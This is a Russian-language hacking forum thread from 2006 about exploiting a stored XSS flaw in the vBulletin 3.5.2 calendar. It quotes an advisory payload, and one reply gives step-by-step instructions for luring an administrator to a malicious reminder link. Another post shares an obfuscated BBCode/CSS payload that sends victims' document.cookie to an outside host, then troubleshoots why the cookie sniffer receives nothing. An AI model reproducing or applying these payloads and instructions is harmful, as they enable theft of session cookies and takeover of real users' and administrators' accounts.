Как использовать эту уязвимость в vBulletin 3.5.2?

ProblemaT New Member

Joined:: 16 Dec 2005

Messages:: 42

Likes Received:: 1

Reputations:: 0

Если не трудно объясните куда её внедрить... эту xss, в клендарь... но куда именно

Vulnerability:
--------------------
Html_Injection :
The software does not properly filter HTML tags in the title of events before being passed to user in 'calendar.php'&'reminder.php AS include'. that may allow a remote user to inject HTML/javascript codes to events of calendar. The hostile code may be rendered in the web browser of the victim user who will Request Reminder for those Events (persistent).
For example an attacker creates new event (Single-All Day Event , Ranged Event OR Recurring Event)with this content:

TITLE:--------->Test<script>alert(document.cookie)</script>
BODY:---------->No matter
OTHER OPTIONS:->No matter

The hostile code will be rendered in the web browser of the victim user who will Request Reminder for this Event via http://example.com/vbulletin/calendar.php?do=addreminder&e=[eventid]
The hostile code will originate from the site running the Vbulletin software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies),or take actions on the site acting as the target user.

http://www.securitylab.ru/vulnerability/source/243694.php

Читаю читаю не могу понять(с английским у меня трудновато)...

#1 ProblemaT, 19 Jan 2006

F_taker New Member

Joined:: 18 Jan 2006

Messages:: 20

Likes Received:: 1

Reputations:: 0

Весьма просто!

Кстати первая уязвимость, которую я использовал)
Знач суть такова, что в заголовке не фильтруется текст на javascript.
Создаешь в календаре событие(желательно на сл.год ) с заголовком, содержащем XSS.
Создал? смотри ссылку в браузере - там после &е= будет число.
Далее подставляешь - http://example.com/vbulletin/calendar.php?do=addreminder&e=[тут число]
впариваешь эту ссылку админу и будет тебе счастье.

#2 F_taker, 19 Jan 2006

milord69 New Member

Joined:: 24 Nov 2005

Messages:: 18

Likes Received:: 0

Reputations:: 0

Эта уязвимость работает на 3.5.0 версии?

#3 milord69, 20 Jan 2006

F_taker New Member

Joined:: 18 Jan 2006

Messages:: 20

Likes Received:: 1

Reputations:: 0

должна работать. В исходнике написано что и ранние версии тоже могут быть уязвимы.

#4 F_taker, 21 Jan 2006

Electro Elder - Старейшина

Joined:: 23 Oct 2005

Messages:: 243

Likes Received:: 45

Reputations:: 39

Ребята вы мне подскажите что я тут не так сделал?
HTML:
[EMAIL=[URL=s as=`[email protected]]mailto:[email protected] ]
sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip	t:document.Images[1].src="htt"+"p"+":"+"/"+"/"+"antichat.org/s/Electro.gif?"+document.cookie)`
Алерт есть, и этот сплойт не палится но на сниффе ничего

#5 Electro, 22 Jan 2006

Last edited: 22 Jan 2006

Barsik Блoxacтый

Joined:: 16 Jan 2005

Messages:: 267

Likes Received:: 238

Reputations:: 182

Ты через Оперу может сидишь? Если да то попробуй через Ie

#6 Barsik, 22 Jan 2006

Electro Elder - Старейшина

Joined:: 23 Oct 2005

Messages:: 243

Likes Received:: 45

Reputations:: 39

Barsik said:

Ты через Оперу может сидишь? Если да то попробуй через Ie
Click to expand...

Неа я под ИЕ

#7 Electro, 22 Jan 2006

Как использовать эту уязвимость в vBulletin 3.5.2?

ProblemaT New Member

F_taker New Member

milord69 New Member

F_taker New Member

Electro Elder - Старейшина

Barsik Блoxacтый

Electro Elder - Старейшина

массовый взлом сайтов

Взлом сайтов

Useful Searches

Как использовать эту уязвимость в vBulletin 3.5.2?

ProblemaT New Member

F_taker New Member

milord69 New Member

F_taker New Member

Electro Elder - Старейшина

Barsik Блoxacтый

Electro Elder - Старейшина

массовый взлом сайтов

Взлом сайтов